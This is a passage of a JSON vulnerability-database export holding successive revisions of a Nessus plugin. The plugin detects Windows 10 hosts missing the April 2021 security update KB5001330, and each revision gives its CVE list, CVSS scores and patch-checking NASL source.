\"CVE-2021-28445\",\n \"CVE-2021-28446\",\n \"CVE-2021-28447\"\n );\n script_xref(name:\"MSKB\", value:\"5001330\");\n script_xref(name:\"MSFT\", value:\"MS21-5001330\");\n\n script_name(english:\"KB5001330: April 2021 Windows 2004 & 20H2 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5001330 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27092\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin, kbs, share;\n\nbulletin = 'MS21-04';\nkbs = make_list(\n '5001330'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n)\n\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-05-07T11:30:50", "differentElements": ["sourceData"], "edition": 2}, {"bulletin": {"id": "SMB_NT_MS21_APR_5001330.NASL", "hash": "2dc9678939fde9cd7a47b0277b1c0ced22e278b56292e84cc29586f6279f3ffc", "type": "nessus", "bulletinFamily": "scanner", "title": "KB5001330: April 2021 Windows 2004 & 20H2 Security Update", "description": "The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-05-05T00:00:00", "modified": "2021-05-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/149259", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://support.microsoft.com/en-us/help/5001330"], "cvelist": ["CVE-2021-28437", "CVE-2021-26415", "CVE-2021-28311", "CVE-2021-28351", "CVE-2021-28447", "CVE-2021-28309", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-26417", "CVE-2021-26416", "CVE-2021-28317", "CVE-2021-28443", "CVE-2021-28352", "CVE-2021-28329", "CVE-2021-28441", "CVE-2021-28347", "CVE-2021-28349", "CVE-2021-28331", "CVE-2021-28440", "CVE-2021-28342", "CVE-2021-28348", "CVE-2021-28444", "CVE-2021-27092", "CVE-2021-28346", "CVE-2021-28442", "CVE-2021-28314", "CVE-2021-28446", "CVE-2021-28323", "CVE-2021-28332", "CVE-2021-28320", "CVE-2021-28436", "CVE-2021-28341", "CVE-2021-27096", "CVE-2021-28337", "CVE-2021-28338", "CVE-2021-28434", "CVE-2021-27093", "CVE-2021-27094", "CVE-2021-28313", "CVE-2021-28319", "CVE-2021-28356", "CVE-2021-28357", "CVE-2021-28318", "CVE-2021-27089", "CVE-2021-28316", "CVE-2021-27086", "CVE-2021-28353", "CVE-2021-28326", "CVE-2021-28315", "CVE-2021-28324", "CVE-2021-28340", "CVE-2021-28343", "CVE-2021-28327", "CVE-2021-28330", "CVE-2021-26413", "CVE-2021-28328", "CVE-2021-27095", "CVE-2021-28345", "CVE-2021-28445", "CVE-2021-28321", "CVE-2021-27088", "CVE-2021-28438", "CVE-2021-28335", "CVE-2021-28439", "CVE-2021-28344", "CVE-2021-28355", "CVE-2021-28312", "CVE-2021-28336", "CVE-2021-28322", "CVE-2021-28358", "CVE-2021-28354", "CVE-2021-27090", "CVE-2021-28334", "CVE-2021-28310", "CVE-2021-28435", "CVE-2021-28339", "CVE-2021-28333", "CVE-2021-28350", "CVE-2021-28325"], "immutableFields": [], "lastseen": "2021-05-14T20:07:26", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"modified": "2021-05-14T20:07:26", "references": [{"idList": ["SECURELIST:A3D3514100806269750A23D748D34C59"], "type": "securelist"}, {"idList": ["THN:F163C7AB35BEF8E28924E14B02752181"], "type": "thn"}, {"idList": ["MS:CVE-2021-28441", "MS:CVE-2021-26416", "MS:CVE-2021-27090", "MS:CVE-2021-28312", "MS:CVE-2021-28324", "MS:CVE-2021-26417"], "type": "mscve"}, {"idList": ["CVE-2021-26416", "CVE-2021-28441", "CVE-2021-28442", "CVE-2021-27086", "CVE-2021-28353", "CVE-2021-28445", "CVE-2021-27088", "CVE-2021-28312", "CVE-2021-28322", "CVE-2021-27090"], "type": "cve"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_VISUAL_STUDIO.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65"], "type": "attackerkb"}], "rev": 2}, "score": {"modified": "2021-05-14T20:07:26", "rev": 2, "value": 5.9, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "149259", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149259);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/05/13\");\n\n script_cve_id(\n \"CVE-2021-26413\",\n \"CVE-2021-26415\",\n \"CVE-2021-26416\",\n \"CVE-2021-26417\",\n \"CVE-2021-27072\",\n \"CVE-2021-27079\",\n \"CVE-2021-27086\",\n \"CVE-2021-27088\",\n \"CVE-2021-27089\",\n \"CVE-2021-27090\",\n \"CVE-2021-27092\",\n \"CVE-2021-27093\",\n \"CVE-2021-27094\",\n \"CVE-2021-27095\",\n \"CVE-2021-27096\",\n \"CVE-2021-28309\",\n \"CVE-2021-28310\",\n \"CVE-2021-28311\",\n \"CVE-2021-28312\",\n \"CVE-2021-28313\",\n \"CVE-2021-28314\",\n \"CVE-2021-28315\",\n \"CVE-2021-28316\",\n \"CVE-2021-28317\",\n \"CVE-2021-28318\",\n \"CVE-2021-28319\",\n \"CVE-2021-28320\",\n \"CVE-2021-28321\",\n \"CVE-2021-28322\",\n \"CVE-2021-28323\",\n \"CVE-2021-28324\",\n \"CVE-2021-28325\",\n \"CVE-2021-28326\",\n \"CVE-2021-28327\",\n \"CVE-2021-28328\",\n \"CVE-2021-28329\",\n \"CVE-2021-28330\",\n \"CVE-2021-28331\",\n \"CVE-2021-28332\",\n \"CVE-2021-28333\",\n \"CVE-2021-28334\",\n \"CVE-2021-28335\",\n \"CVE-2021-28336\",\n \"CVE-2021-28337\",\n \"CVE-2021-28338\",\n \"CVE-2021-28339\",\n \"CVE-2021-28340\",\n \"CVE-2021-28341\",\n \"CVE-2021-28342\",\n \"CVE-2021-28343\",\n \"CVE-2021-28344\",\n \"CVE-2021-28345\",\n \"CVE-2021-28346\",\n \"CVE-2021-28347\",\n \"CVE-2021-28348\",\n \"CVE-2021-28349\",\n \"CVE-2021-28350\",\n \"CVE-2021-28351\",\n \"CVE-2021-28352\",\n \"CVE-2021-28353\",\n \"CVE-2021-28354\",\n \"CVE-2021-28355\",\n \"CVE-2021-28356\",\n \"CVE-2021-28357\",\n \"CVE-2021-28358\",\n \"CVE-2021-28434\",\n \"CVE-2021-28435\",\n \"CVE-2021-28436\",\n \"CVE-2021-28437\",\n \"CVE-2021-28438\",\n \"CVE-2021-28439\",\n \"CVE-2021-28440\",\n \"CVE-2021-28441\",\n \"CVE-2021-28442\",\n \"CVE-2021-28443\",\n \"CVE-2021-28444\",\n \"CVE-2021-28445\",\n \"CVE-2021-28446\",\n \"CVE-2021-28447\"\n );\n script_xref(name:\"MSKB\", value:\"5001330\");\n script_xref(name:\"IAVA\", value:\"2021-A-0168\");\n script_xref(name:\"MSFT\", value:\"MS21-5001330\");\n\n script_name(english:\"KB5001330: April 2021 Windows 2004 & 20H2 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5001330 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27092\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin, kbs, share;\n\nbulletin = 'MS21-04';\nkbs = make_list(\n '5001330'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n)\n\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-05-14T20:07:26", "differentElements": ["sourceData"], "edition": 3}, {"bulletin": {"id": "SMB_NT_MS21_APR_5001330.NASL", "hash": "4bcabbdb775a54f8211e68a0550244839cfdb284ec56154ab5090f1ece25815c", "type": "nessus", "bulletinFamily": "scanner", "title": "KB5001330: April 2021 Windows 2004 & 20H2 Security Update", "description": "The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-05-05T00:00:00", "modified": "2021-05-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/149259", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://support.microsoft.com/en-us/help/5001330"], "cvelist": ["CVE-2021-28437", "CVE-2021-26415", "CVE-2021-28311", "CVE-2021-28351", "CVE-2021-28447", "CVE-2021-28309", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-26417", "CVE-2021-26416", "CVE-2021-28317", "CVE-2021-28443", "CVE-2021-28352", "CVE-2021-28329", "CVE-2021-28441", "CVE-2021-28347", "CVE-2021-28349", "CVE-2021-28331", "CVE-2021-28440", "CVE-2021-28342", "CVE-2021-28348", "CVE-2021-28444", "CVE-2021-27092", "CVE-2021-28346", "CVE-2021-28442", "CVE-2021-28314", "CVE-2021-28446", "CVE-2021-28323", "CVE-2021-28332", "CVE-2021-28320", "CVE-2021-28436", "CVE-2021-28341", "CVE-2021-27096", "CVE-2021-28337", "CVE-2021-28338", "CVE-2021-28434", "CVE-2021-27093", "CVE-2021-27094", "CVE-2021-28313", "CVE-2021-28319", "CVE-2021-28356", "CVE-2021-28357", "CVE-2021-28318", "CVE-2021-27089", "CVE-2021-28316", "CVE-2021-27086", "CVE-2021-28353", "CVE-2021-28326", "CVE-2021-28315", "CVE-2021-28324", "CVE-2021-28340", "CVE-2021-28343", "CVE-2021-28327", "CVE-2021-28330", "CVE-2021-26413", "CVE-2021-28328", "CVE-2021-27095", "CVE-2021-28345", "CVE-2021-28445", "CVE-2021-28321", "CVE-2021-27088", "CVE-2021-28438", "CVE-2021-28335", "CVE-2021-28439", "CVE-2021-28344", "CVE-2021-28355", "CVE-2021-28312", "CVE-2021-28336", "CVE-2021-28322", "CVE-2021-28358", "CVE-2021-28354", "CVE-2021-27090", "CVE-2021-28334", "CVE-2021-28310", "CVE-2021-28435", "CVE-2021-28339", "CVE-2021-28333", "CVE-2021-28350", "CVE-2021-28325"], "immutableFields": [], "lastseen": "2021-06-04T03:45:34", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"modified": "2021-06-04T03:45:34", "references": [{"idList": ["CVE-2021-26417", "CVE-2021-28441", "CVE-2021-28314", "CVE-2021-28446", "CVE-2021-28436", "CVE-2021-27086", "CVE-2021-28324", "CVE-2021-27088", "CVE-2021-28312", "CVE-2021-27090"], "type": "cve"}, {"idList": ["MSF:ILITIES/MSFT-CVE-2021-27079/", "MSF:ILITIES/MSFT-CVE-2021-28319/", "MSF:ILITIES/MSFT-CVE-2021-26415/", "MSF:ILITIES/MSFT-CVE-2021-26413/", "MSF:ILITIES/MSFT-CVE-2021-28325/", "MSF:ILITIES/MSFT-CVE-2021-28318/", "MSF:ILITIES/MSFT-CVE-2021-28311/", "MSF:ILITIES/MSFT-CVE-2021-28440/"], "type": "metasploit"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["KB5001330"], "type": "mskb"}, {"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_VISUAL_STUDIO.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65"], "type": "attackerkb"}], "rev": 2}, "score": {"modified": "2021-06-04T03:45:34", "rev": 2, "value": 5.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "149259", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149259);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2021-26413\",\n \"CVE-2021-26415\",\n \"CVE-2021-26416\",\n \"CVE-2021-26417\",\n \"CVE-2021-27072\",\n \"CVE-2021-27079\",\n \"CVE-2021-27086\",\n \"CVE-2021-27088\",\n \"CVE-2021-27089\",\n \"CVE-2021-27090\",\n \"CVE-2021-27092\",\n \"CVE-2021-27093\",\n \"CVE-2021-27094\",\n \"CVE-2021-27095\",\n \"CVE-2021-27096\",\n \"CVE-2021-28309\",\n \"CVE-2021-28310\",\n \"CVE-2021-28311\",\n \"CVE-2021-28312\",\n \"CVE-2021-28313\",\n \"CVE-2021-28314\",\n \"CVE-2021-28315\",\n \"CVE-2021-28316\",\n \"CVE-2021-28317\",\n \"CVE-2021-28318\",\n \"CVE-2021-28319\",\n \"CVE-2021-28320\",\n \"CVE-2021-28321\",\n \"CVE-2021-28322\",\n \"CVE-2021-28323\",\n \"CVE-2021-28324\",\n \"CVE-2021-28325\",\n \"CVE-2021-28326\",\n \"CVE-2021-28327\",\n \"CVE-2021-28328\",\n \"CVE-2021-28329\",\n \"CVE-2021-28330\",\n \"CVE-2021-28331\",\n \"CVE-2021-28332\",\n \"CVE-2021-28333\",\n \"CVE-2021-28334\",\n \"CVE-2021-28335\",\n \"CVE-2021-28336\",\n \"CVE-2021-28337\",\n \"CVE-2021-28338\",\n \"CVE-2021-28339\",\n \"CVE-2021-28340\",\n \"CVE-2021-28341\",\n \"CVE-2021-28342\",\n \"CVE-2021-28343\",\n \"CVE-2021-28344\",\n \"CVE-2021-28345\",\n \"CVE-2021-28346\",\n \"CVE-2021-28347\",\n \"CVE-2021-28348\",\n \"CVE-2021-28349\",\n \"CVE-2021-28350\",\n \"CVE-2021-28351\",\n \"CVE-2021-28352\",\n \"CVE-2021-28353\",\n \"CVE-2021-28354\",\n \"CVE-2021-28355\",\n \"CVE-2021-28356\",\n \"CVE-2021-28357\",\n \"CVE-2021-28358\",\n \"CVE-2021-28434\",\n \"CVE-2021-28435\",\n \"CVE-2021-28436\",\n \"CVE-2021-28437\",\n \"CVE-2021-28438\",\n \"CVE-2021-28439\",\n \"CVE-2021-28440\",\n \"CVE-2021-28441\",\n \"CVE-2021-28442\",\n \"CVE-2021-28443\",\n \"CVE-2021-28444\",\n \"CVE-2021-28445\",\n \"CVE-2021-28446\",\n \"CVE-2021-28447\"\n );\n script_xref(name:\"MSKB\", value:\"5001330\");\n script_xref(name:\"IAVA\", value:\"2021-A-0168-S\");\n script_xref(name:\"MSFT\", value:\"MS21-5001330\");\n\n script_name(english:\"KB5001330: April 2021 Windows 2004 & 20H2 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5001330 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27092\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin, kbs, share;\n\nbulletin = 'MS21-04';\nkbs = make_list(\n '5001330'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n)\n\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-06-04T03:45:34", "differentElements": ["cvss2", "cvss3", "sourceData", "title"], "edition": 4}, {"bulletin": {"id": "SMB_NT_MS21_APR_5001330.NASL", "hash": "ad356b7e80803b0c35142188d65e8915", "type": "nessus", "bulletinFamily": "scanner", "title": "KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)", "description": "The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-05-05T00:00:00", "modified": "2021-05-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.7, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 3.1, "impactScore": 4.0}, "href": "https://www.tenable.com/plugins/nessus/149259", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://support.microsoft.com/en-us/help/5001330"], "cvelist": ["CVE-2021-28437", "CVE-2021-26415", "CVE-2021-28311", "CVE-2021-28351", "CVE-2021-28447", "CVE-2021-28309", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-26417", "CVE-2021-26416", "CVE-2021-28317", "CVE-2021-28443", "CVE-2021-28352", "CVE-2021-28329", "CVE-2021-28441", "CVE-2021-28347", "CVE-2021-28349", "CVE-2021-28331", "CVE-2021-28440", "CVE-2021-28342", "CVE-2021-28348", "CVE-2021-28444", "CVE-2021-27092", "CVE-2021-28346", "CVE-2021-28442", "CVE-2021-28314", "CVE-2021-28446", "CVE-2021-28323", "CVE-2021-28332", "CVE-2021-28320", "CVE-2021-28436", "CVE-2021-28341", "CVE-2021-27096", "CVE-2021-28337", "CVE-2021-28338", "CVE-2021-28434", "CVE-2021-27093", "CVE-2021-27094", "CVE-2021-28313", "CVE-2021-28319", "CVE-2021-28356", "CVE-2021-28357", "CVE-2021-28318", "CVE-2021-27089", "CVE-2021-28316", "CVE-2021-27086", "CVE-2021-28353", "CVE-2021-28326", "CVE-2021-28315", "CVE-2021-28324", "CVE-2021-28340", "CVE-2021-28343", "CVE-2021-28327", "CVE-2021-28330", "CVE-2021-26413", "CVE-2021-28328", "CVE-2021-27095", "CVE-2021-28345", "CVE-2021-28445", "CVE-2021-28321", "CVE-2021-27088", "CVE-2021-28438", "CVE-2021-28335", "CVE-2021-28439", "CVE-2021-28344", "CVE-2021-28355", "CVE-2021-28312", "CVE-2021-28336", "CVE-2021-28322", "CVE-2021-28358", "CVE-2021-28354", "CVE-2021-27090", "CVE-2021-28334", "CVE-2021-28310", "CVE-2021-28435", "CVE-2021-28339", "CVE-2021-28333", "CVE-2021-28350", "CVE-2021-28325"], "immutableFields": [], "lastseen": "2021-07-29T03:55:02", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": 